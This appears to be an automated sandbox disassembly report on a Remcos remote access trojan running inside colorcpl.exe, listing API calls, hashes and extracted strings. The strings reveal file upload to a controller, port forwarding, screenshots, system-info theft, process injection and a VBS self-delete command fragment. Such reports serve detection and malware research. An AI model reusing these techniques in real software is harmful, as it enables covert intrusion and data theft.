• Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
• API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
• String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller:
• API String ID: 3086580692-2596673759
• Opcode ID: 6f9f9742f40d58fbf2db49fa28066a2201dbcd018bedeab4dd42b1aed27d4889
• Instruction ID: 812357f67b14a66104bd3188d5a13ccb59e21d15c149bd5c6c363a2c27b7339e
• Opcode Fuzzy Hash: 6f9f9742f40d58fbf2db49fa28066a2201dbcd018bedeab4dd42b1aed27d4889
• Instruction Fuzzy Hash: 58B1A0316083449FEB54FB24CC90B6FB7EAAF95394F40491DE68A47290EF719909CF52
APIs
Memory Dump Source
• Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
• API ID: _free
• String ID:
• API String ID: 269201875-0
• Opcode ID: bd8feffa2fc4f0093300b9b424e238ab6d2c9714c7ba87615236bfdc0a1c89d1
• Instruction ID: 54bfcd63b36b9a6fa818e6a2bc12facc74c70272a61de5c56d65a885c63c9de6
• Opcode Fuzzy Hash: bd8feffa2fc4f0093300b9b424e238ab6d2c9714c7ba87615236bfdc0a1c89d1
• Instruction Fuzzy Hash: D4C134B2D40214ABEF21DBA8CC42F9EB7FDAB14740F144165FB45FB281DAB09E419B54
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 02FA2B08
  • Part of subcall function 02FABA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,02FF6478,02F9D248,.vbs,?,?,?,?,?,030052F0), ref: 02FABA30
  • Part of subcall function 02FA85A3: CloseHandle.KERNEL32(02F940F5,?,?,02F940F5,02FF5E84), ref: 02FA85B9
  • Part of subcall function 02FA85A3: CloseHandle.KERNEL32(02FF5E84,?,?,02F940F5,02FF5E84), ref: 02FA85C2
• Sleep.KERNEL32(0000000A,02FF5E84), ref: 02FA2C5A
• Sleep.KERNEL32(0000000A,02FF5E84,02FF5E84), ref: 02FA2CFC
• Sleep.KERNEL32(0000000A,02FF5E84,02FF5E84,02FF5E84), ref: 02FA2D9E
• DeleteFileW.KERNEL32(00000000,02FF5E84,02FF5E84,02FF5E84), ref: 02FA2E00
• DeleteFileW.KERNEL32(00000000,02FF5E84,02FF5E84,02FF5E84), ref: 02FA2E37
• DeleteFileW.KERNEL32(00000000,02FF5E84,02FF5E84,02FF5E84), ref: 02FA2E73
• Sleep.KERNEL32(000001F4,02FF5E84,02FF5E84,02FF5E84), ref: 02FA2E8D
• Sleep.KERNEL32(00000064), ref: 02FA2ECF
  • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
Strings
Memory Dump Source
• Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
• API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
• String ID: /stext "
• API String ID: 1223786279-3856184850
• Opcode ID: 26237ab6bdfdc0aa371f0e9a0d3c001bcecf2919875030162a78f1e8f096c1a6
• Instruction ID: f75568a573801134937c9ae4db4ec7b1f61908977b29977ae13ac5ef0c845caf
• Opcode Fuzzy Hash: 26237ab6bdfdc0aa371f0e9a0d3c001bcecf2919875030162a78f1e8f096c1a6
• Instruction Fuzzy Hash: EB0234316083455AEB29FB60DCA0BEFB3E6AF94384F50492DD68A47190EF705A4DCE52
Strings
Memory Dump Source
• Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
• API ID:
• String ID: 65535$udp
• API String ID: 0-1267037602
• Opcode ID: 2e818486c25de5a7d779a9879a6d215c1841de71701d1ec2149a22ac49dea310
• Instruction ID: d987c2068ce63660b382a7f6eae10b5d084b0e7d113cd228779416b1bb746d96
• Opcode Fuzzy Hash: 2e818486c25de5a7d779a9879a6d215c1841de71701d1ec2149a22ac49dea310
• Instruction Fuzzy Hash: E75117F2A45315ABD7648A14C924B7B77E8EF847C8F04082DFB8797750D7E4D840CA62
APIs
  • Part of subcall function 02FA288B: TerminateProcess.KERNEL32(00000000,pth_unenc,02F9F903), ref: 02FA289B
  • Part of subcall function 02FA288B: WaitForSingleObject.KERNEL32(000000FF), ref: 02FA28AE
  • Part of subcall function 02FA3733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,030052F0), ref: 02FA374F
  • Part of subcall function 02FA3733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 02FA3768
  • Part of subcall function 02FA3733: RegCloseKey.KERNEL32(00000000), ref: 02FA3773
• GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 02F9D894
• ShellExecuteW.SHELL32(00000000,open,00000000,02FF6478,02FF6478,00000000), ref: 02F9D9F3
• ExitProcess.KERNEL32 ref: 02F9D9FF
Strings
Memory Dump Source
• Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
• API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
• String ID: """, 0$.vbs$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
• API String ID: 1913171305-2411266221
• Opcode ID: 45944300ba0ff65bac8a07489858dd08ebb9bc72760cd6a2c5f7a424450b39a3
• Instruction ID: d86f05814569c893bb2aa466c97b3d7763eb897502f6ea0ca5ba1cd156f66a0f
• Opcode Fuzzy Hash: 45944300ba0ff65bac8a07489858dd08ebb9bc72760cd6a2c5f7a424450b39a3
• Instruction Fuzzy Hash: 4B411D719001199AFF15FBA4DC54DEFB77AAF61784F100169E70AA70A1FF205E4ACE90
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02F91D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02FCA912
• GetLastError.KERNEL32(?,?,02F91D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02FCA91F
• __dosmaperr.LIBCMT ref: 02FCA926
• MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,02F91D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02FCA952
• GetLastError.KERNEL32(?,?,?,02F91D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02FCA95C
• __dosmaperr.LIBCMT ref: 02FCA963
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,02F91D55,?), ref: 02FCA9A6
• GetLastError.KERNEL32(?,?,?,?,?,?,02F91D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 02FCA9B0
• __dosmaperr.LIBCMT ref: 02FCA9B7
• _free.LIBCMT ref: 02FCA9C3
• _free.LIBCMT ref: 02FCA9CA
Memory Dump Source
• Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
• API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
• String ID:
• API String ID: 2441525078-0
• Opcode ID: cb51fd4cd0ab0e88ae17ff8d32e81072d52518d8a83dfe1514026e278c4882e9
• Instruction ID: 9b4a7933fc8971485a56fcfeebfe41471be51ea84043aa1238605b8395be34c1
• Opcode Fuzzy Hash: cb51fd4cd0ab0e88ae17ff8d32e81072d52518d8a83dfe1514026e278c4882e9
• Instruction Fuzzy Hash: F731DF72D0420FAFDF15AFA4DC45DAE7B7EAF053A4B24411DFA2096290DB30D950CBA0
APIs
• SetEvent.KERNEL32(?,?), ref: 02F954BF
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02F9556F
• TranslateMessage.USER32(?), ref: 02F9557E
• DispatchMessageA.USER32(?), ref: 02F95589
• HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,03004F78), ref: 02F95641
• HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 02F95679
  • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
Strings
Memory Dump Source
• Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
• API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
• String ID: CloseChat$DisplayMessage$GetMessage
• API String ID: 2956720200-749203953
• Opcode ID: 0353e37e3496a1447bcb71b11d66b51ea9e53ecbab52741b87f7268078b68e00
• Instruction ID: fd02175196b18f66ca9d8bb5d984f8d52af4add25bd939e562cc36382ebd084e
• Opcode Fuzzy Hash: 0353e37e3496a1447bcb71b11d66b51ea9e53ecbab52741b87f7268078b68e00
• Instruction Fuzzy Hash: FF41D272A04201ABEF11FB74CC5896F77AEAB85784F40092CF75697294EF348905CF92
APIs
• CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 02FA3452
• MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 02FA3460
• GetFileSize.KERNEL32(?,00000000), ref: 02FA346D
• UnmapViewOfFile.KERNEL32(00000000), ref: 02FA348D
• CloseHandle.KERNEL32(00000000), ref: 02FA349A
• CloseHandle.KERNEL32(?), ref: 02FA34A0
Memory Dump Source
• Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
• Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
• API ID: File$CloseHandleView$CreateMappingSizeUnmap
• String ID:
• API String ID: 297527592-0
• Opcode ID: 61fffd6ca1e2f67873e719f6d38460d17d0b6709d38284d2bcbf11c67d16d6ea
• Instruction ID: b23b3dd3ada082349e3cd247fcf22d796fa9f3d49b3fe714b96b9a1fd991b1d1
• Opcode Fuzzy Hash: 61fffd6ca1e2f67873e719f6d38460d17d0b6709d38284d2bcbf11c67d16d6ea
• Instruction Fuzzy Hash: C541EFB2A08305BFEB11AB25ED49F2B7BADEFC57A8F10091DF745D6090DB7485008B62
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,02FAA517,00000000), ref: 02FAABAD
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,02FAA517,00000000), ref: 02FAABC4
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02FAA517,00000000), ref: 02FAABD1
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02FAA517,00000000), ref: 02FAABE0
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02FAA517,00000000), ref: 02FAABF1
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02FAA517,00000000), ref: 02FAABF4
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: 58a1b30afe7fb167efec1c944a00d0c274c484b347ef3a9b6d43fea5f736acf0
                                                          • Instruction ID: f5300faeea46d55bb97e7cf6bb35040ab6be4caeb8ad3d48d710fe64c3403e90
                                                          • Opcode Fuzzy Hash: 58a1b30afe7fb167efec1c944a00d0c274c484b347ef3a9b6d43fea5f736acf0
                                                          • Instruction Fuzzy Hash: DF11E572D8111CBFDB12AB759C88DFF7B7CDB42AE1B400416FB0696140EBA48D49DAB1
                                                          APIs
                                                          • _free.LIBCMT ref: 02FD81B5
                                                            • Part of subcall function 02FD6802: RtlFreeHeap.NTDLL(00000000,00000000,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?), ref: 02FD6818
                                                            • Part of subcall function 02FD6802: GetLastError.KERNEL32(?,?,02FE0CEF,?,00000000,?,00000000,?,02FE0F93,?,00000007,?,?,02FE14DE,?,?), ref: 02FD682A
                                                          • _free.LIBCMT ref: 02FD81C1
                                                          • _free.LIBCMT ref: 02FD81CC
                                                          • _free.LIBCMT ref: 02FD81D7
                                                          • _free.LIBCMT ref: 02FD81E2
                                                          • _free.LIBCMT ref: 02FD81ED
                                                          • _free.LIBCMT ref: 02FD81F8
                                                          • _free.LIBCMT ref: 02FD8203
                                                          • _free.LIBCMT ref: 02FD820E
                                                          • _free.LIBCMT ref: 02FD821C
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: a6e25838a7112d05adab680db68a709fd41a760b8b65c12ea30f51b2c2870b29
                                                          • Instruction ID: cd16758def8ccac3c73e465262bc288fb53ec4262522b70d035dbc8a977d63e2
                                                          • Opcode Fuzzy Hash: a6e25838a7112d05adab680db68a709fd41a760b8b65c12ea30f51b2c2870b29
                                                          • Instruction Fuzzy Hash: FE11B6B6940108BFCB01EF54DC52CD97BABFF04391B4945A5FA488F261DB71EA50AF80
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Eventinet_ntoa
                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$X=t
                                                          • API String ID: 3578746661-247780323
                                                          • Opcode ID: 2a9d86930cb3d0147ce9730805902b4c153491b83de5dfc74a8e39c8cebebca0
                                                          • Instruction ID: 5c63fcf7b9ea540177d5558e32e114ba970325da9d6c823239786b5275fb1c49
                                                          • Opcode Fuzzy Hash: 2a9d86930cb3d0147ce9730805902b4c153491b83de5dfc74a8e39c8cebebca0
                                                          • Instruction Fuzzy Hash: 9051C571B042455BDB14FB34CC68A6F77AAAB403C4F40092AE719876A4DF789D09CF92
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 02FAA04A
                                                          • GdiplusStartup.GDIPLUS(03004ACC,?,00000000), ref: 02FAA07C
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 02FAA108
                                                          • Sleep.KERNEL32(000003E8), ref: 02FAA18E
                                                          • GetLocalTime.KERNEL32(?), ref: 02FAA196
                                                          • Sleep.KERNEL32(00000000,00000018,00000000), ref: 02FAA285
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                          • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                          • API String ID: 489098229-3790400642
                                                          • Opcode ID: 3b8cb5600b0408c36e5d5fcb5005a71d9977a98921b5258ebb26488517725b4e
                                                          • Instruction ID: a10f5b6a4d9547c3eb372e7a251d00b58de6c31b2df6dcf10ec80c998d59c1dd
                                                          • Opcode Fuzzy Hash: 3b8cb5600b0408c36e5d5fcb5005a71d9977a98921b5258ebb26488517725b4e
                                                          • Instruction Fuzzy Hash: 6D517F71E002199AEF15FBB4CC64AFEB7BAAF55384F400069E709AB190EF645D49CF60
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 02FA7530
                                                            • Part of subcall function 02FAC516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,02F9A87E), ref: 02FAC52F
                                                          • Sleep.KERNEL32(00000064), ref: 02FA755C
                                                          • DeleteFileW.KERNEL32(00000000), ref: 02FA7590
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                          • API String ID: 1462127192-2001430897
                                                          • Opcode ID: 6a382eb56d45bd294352081d51f82600e6694c2d77c3a68e10bf5d08c4673ad7
                                                          • Instruction ID: 2c1e63187144e10d48dce5134854e2f8017353e7e57462f2baeca7d722aa1584
                                                          • Opcode Fuzzy Hash: 6a382eb56d45bd294352081d51f82600e6694c2d77c3a68e10bf5d08c4673ad7
                                                          • Instruction Fuzzy Hash: E631647194011D9AFF14FBA0DC91EFEB73AAF107C4F000569E70A67190EF605A8ACE94
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(03002B14,00000000,030052D8,00003000,00000004,00000000,00000001), ref: 02F97418
                                                          • GetCurrentProcess.KERNEL32(03002B14,00000000,00008000,?,00000000,00000001,00000000,02F97691,C:\Windows\SysWOW64\colorcpl.exe), ref: 02F974D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CurrentProcess
                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                          • API String ID: 2050909247-4242073005
                                                          • Opcode ID: 427be8bef0051e4ae030a7a0c0e6a0d35710067e54248d1245e3140cc335642c
                                                          • Instruction ID: b137db1351caed095322bd2236250957744ba2ec104bd6f1502122bcb02ad2c8
                                                          • Opcode Fuzzy Hash: 427be8bef0051e4ae030a7a0c0e6a0d35710067e54248d1245e3140cc335642c
                                                          • Instruction Fuzzy Hash: F531CEB2662300AFFB50FF68DC89F1AB7ADAB05799F100819F711E6654DB78D8008F61
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02FAD507
                                                            • Part of subcall function 02FAD5A0: RegisterClassExA.USER32(00000030), ref: 02FAD5EC
                                                            • Part of subcall function 02FAD5A0: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 02FAD607
                                                            • Part of subcall function 02FAD5A0: GetLastError.KERNEL32 ref: 02FAD611
                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 02FAD53E
                                                          • lstrcpynA.KERNEL32(03004B60,Remcos,00000080), ref: 02FAD558
                                                          • Shell_NotifyIconA.SHELL32(00000000,03004B48), ref: 02FAD56E
                                                          • TranslateMessage.USER32(?), ref: 02FAD57A
                                                          • DispatchMessageA.USER32(?), ref: 02FAD584
                                                          • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 02FAD591
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                          • String ID: Remcos
                                                          • API String ID: 1970332568-165870891
                                                          • Opcode ID: 922c47510b9b2e584b69c44f248a733fd0c41f4c1b211e30eaaaa08505a2b7fb
                                                          • Instruction ID: b27435003332332d50b03225da0260a9725e65f35ecfb23d6cbcf3ca103492c5
                                                          • Opcode Fuzzy Hash: 922c47510b9b2e584b69c44f248a733fd0c41f4c1b211e30eaaaa08505a2b7fb
                                                          • Instruction Fuzzy Hash: FF010CB1941248EFEB10EBA6E84CF9ABBBCAB85748F004419F61197185D7B850558F64
                                                          APIs
                                                            • Part of subcall function 02FD8295: GetLastError.KERNEL32(00000020,?,02FCA875,?,?,?,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B), ref: 02FD8299
                                                            • Part of subcall function 02FD8295: _free.LIBCMT ref: 02FD82CC
                                                            • Part of subcall function 02FD8295: SetLastError.KERNEL32(00000000,02FCF9F8,?,?,00000020,00000000,?,?,?,02FBDD92,0000003B,?,00000041,00000000,00000000), ref: 02FD830D
                                                            • Part of subcall function 02FD8295: _abort.LIBCMT ref: 02FD8313
                                                          • _memcmp.LIBVCRUNTIME ref: 02FD54A4
                                                          • _free.LIBCMT ref: 02FD5515
                                                          • _free.LIBCMT ref: 02FD552E
                                                          • _free.LIBCMT ref: 02FD5560
                                                          • _free.LIBCMT ref: 02FD5569
                                                          • _free.LIBCMT ref: 02FD5575
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                          • String ID: C
                                                          • API String ID: 1679612858-1037565863
                                                          • Opcode ID: f63d67da839974f6464f21b321d4400677d4e43379f9778dcf9142f135658384
                                                          • Instruction ID: 271432653af2b06e92d6ad3cf615227df3e89019efcbd7a576f56526cd4c312a
                                                          • Opcode Fuzzy Hash: f63d67da839974f6464f21b321d4400677d4e43379f9778dcf9142f135658384
                                                          • Instruction Fuzzy Hash: CAB16B75E012199FDB24DF18C884BADB7B6FF08345F9445AADA0AA7350E771AE90CF40
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: tcp$udp
                                                          • API String ID: 0-3725065008
                                                          • Opcode ID: eb5556802adc7ccd6a1185782b3a19f38eb94240a2cac5942d9b802d60cdedf8
                                                          • Instruction ID: 0e9a37ee758075729768e1b3b0884b2e9717d46ca819e0877ff834c3113deda4
                                                          • Opcode Fuzzy Hash: eb5556802adc7ccd6a1185782b3a19f38eb94240a2cac5942d9b802d60cdedf8
                                                          • Instruction Fuzzy Hash: 49717FB9A093068FDB24CE54C46572AB7E5FF887C8F14482EFA8687260D7F4C944DB52
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,03004EE0,02FF5FB4,?,00000000,02F98037,00000000), ref: 02F97A00
                                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,02F98037,00000000,?,?,0000000A,00000000), ref: 02F97A48
                                                            • Part of subcall function 02F94AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 02F94B36
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,02F98037,00000000,?,?,0000000A,00000000), ref: 02F97A88
                                                          • MoveFileW.KERNEL32(00000000,00000000), ref: 02F97AA5
                                                          • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 02F97AD0
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 02F97AE0
                                                            • Part of subcall function 02F94B96: WaitForSingleObject.KERNEL32(?,000000FF,?,03004EF8,02F94C49,00000000,?,?,?,03004EF8,?), ref: 02F94BA5
                                                            • Part of subcall function 02F94B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02F9548B), ref: 02F94BC3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                          • String ID: .part
                                                          • API String ID: 1303771098-3499674018
                                                          • Opcode ID: f17e3cf3119c1af140c3676c61aaed52adca5990fa3a1eef05e99185fe9c9656
                                                          • Instruction ID: d0504df40c9c49967dfc2c9733b179a443aaf6c9a1d2380ec1cec98895315edd
                                                          • Opcode Fuzzy Hash: f17e3cf3119c1af140c3676c61aaed52adca5990fa3a1eef05e99185fe9c9656
                                                          • Instruction Fuzzy Hash: 4F31A071548349AFEB14EB60DC449ABF3ADFF94395F00492DF68692150EB709E08CFA2
                                                          APIs
                                                          • SendInput.USER32 ref: 02FA9A25
                                                          • SendInput.USER32(00000001,?,0000001C,00000000), ref: 02FA9A4D
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 02FA9A74
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 02FA9A92
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 02FA9AB2
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 02FA9AD7
                                                          • SendInput.USER32(00000001,0000001C,0000001C), ref: 02FA9AF9
                                                          • SendInput.USER32(00000001,00000000,0000001C), ref: 02FA9B1C
                                                            • Part of subcall function 02FA99CE: MapVirtualKeyA.USER32(00000000,00000000), ref: 02FA99D4
                                                          Memory Dump Source
                                                          • Source File: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, Offset: 02F90000, based on PE: true
                                                          • Associated: 00000007.00000002.4510477768.0000000003008000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_7_2_2f90000_colorcpl.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InputSend$Virtual
                                                          • String ID:
                                                          • API String ID: 1167301434-0
                                                          • Opcode ID: fca5fb6f645d95b16f9118492f2e8e276f034bf71b8b650e714e00a52ed8a47d
                                                          • Instruction ID: 2f3964b1019d216b77004e7c36fa36c7281d339b1627b57b705470c4ad1ce707
                                                          • Opcode Fuzzy Hash: fca5fb6f645d95b16f9118492f2e8e276f034bf71b8b650e714e00a52ed8a47d
                                                          • Instruction Fuzzy Hash: 96319F61248349A9E221DFA5DC50B9FFBECAFC9B84F04081FB68497190DAE0894C8767
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 02FA697C
